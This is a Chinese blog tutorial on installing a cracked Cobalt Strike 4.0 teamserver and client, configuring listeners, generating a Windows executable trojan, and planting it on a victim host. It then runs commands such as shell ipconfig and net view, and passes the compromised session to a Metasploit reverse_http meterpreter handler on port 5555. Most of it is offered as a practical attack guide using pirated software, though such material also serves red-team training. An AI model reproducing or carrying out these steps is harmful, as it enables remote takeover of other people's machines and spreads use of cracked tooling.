Cobaltstrike的安装和基本使用+MSF联动

Cobaltstrike的安装

注意:配置cs需要配置客户端和服务器

服务器端

首先下载cobaltstrike,下载完成后,将cobaltstrike4.0-cracked.zip上传至服务器并解压,第一次运行需要安装java环境,进入解压后的目录运行如下命令:

./teamserver 101.43.x.x password  #这里的密码是一会要验证的密码,随便输入,ip是自己服务器的ip

在这里插入图片描述

客户端

将cobaltstrike4.0-cracked.zip解压,双击运行start.bat,并配置你的服务器ip和端口(默认50050),点击Connection

这里的用户名随便填,密码就是刚刚在服务器上设置的密码

Cobaltstrike的安装和基本使用+MSF联动_第1张图片
连接完成界面;
Cobaltstrike的安装和基本使用+MSF联动_第2张图片

Cobaltstrike的使用

Cobaltstrike和msfconsole最大的区别就是CS支持多个人一同协作(多人运动),因为是多人协作,所以需要区分一下哪些资源是各自的,通过配置监听器来实现拥有各自的监听管道
Cobaltstrike的安装和基本使用+MSF联动_第3张图片
按照下图配置完成后,点击HTTP Hosts右边的+号,最后save保存即可
Cobaltstrike的安装和基本使用+MSF联动_第4张图片
到这里,监听器就配置完成了!


简单木马生成实例

下面来举一个简单的实现攻击的例子:
这里面是常见的攻击工具,我们拿下图的Windows Executable为例
Cobaltstrike的安装和基本使用+MSF联动_第5张图片
配置木马的监听器,配置完成后点击Generate生成木马,将其导出即可
Cobaltstrike的安装和基本使用+MSF联动_第6张图片
将该木马放到受害主机上双击运行,即可收到上线提示
在这里插入图片描述

命令的输入

进入图形化界面右击鼠标选择Interact,即可输入命令,输入help可以查看命令列表
Cobaltstrike的安装和基本使用+MSF联动_第7张图片
例如输入一条cmd命令:

shell ipconfig

在这里插入图片描述
探针其他主机

net view

插件的扩展

CS本身自带的插件并不是很多,所以如果有更多需求,可以通过扩展插件来解决
Cobaltstrike的安装和基本使用+MSF联动_第8张图片

Cobaltstrike与Msfconsole的联动

部署Msfconsole

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 5555      #监听5555端口
exploit

部署Cobaltstrike

1.添加一个msf监听器,HTTP Host是你的外网服务器地址,HTTP Port 自定义
Cobaltstrike的安装和基本使用+MSF联动_第9张图片
2.添加一个木马监听器
Cobaltstrike的安装和基本使用+MSF联动_第10张图片
3.生成木马,并选择名为wooden horse的监听器,并用木马控制目标主机(步骤省略)
Cobaltstrike的安装和基本使用+MSF联动_第11张图片
4.右击受控主机,点击spawn,并选择名为msf的监听器
Cobaltstrike的安装和基本使用+MSF联动_第12张图片

同时msfconsole服务器这边选择监听

use exploit/multi/handler
set lhost 0.0.0.0
set lport 5555
set payload windows/meterpreter/reverse_http

这时候再去看msfconsole服务器,已经成功收到反弹会话【这里可能要等待连接的时间有点长】
Cobaltstrike的安装和基本使用+MSF联动_第13张图片


这里有个坑我有必要说一下,由下图可知msf联动的监听器的payload是http的,我之前一直在msf配置windows/meterpreter/reverse_tcp,结果导致一直断开连接,连接不上,一定要注意,这边的payload是啥,对应那边就用啥!!!
在这里插入图片描述

你可能感兴趣的:(网络安全,Tools,服务器,linux,安全)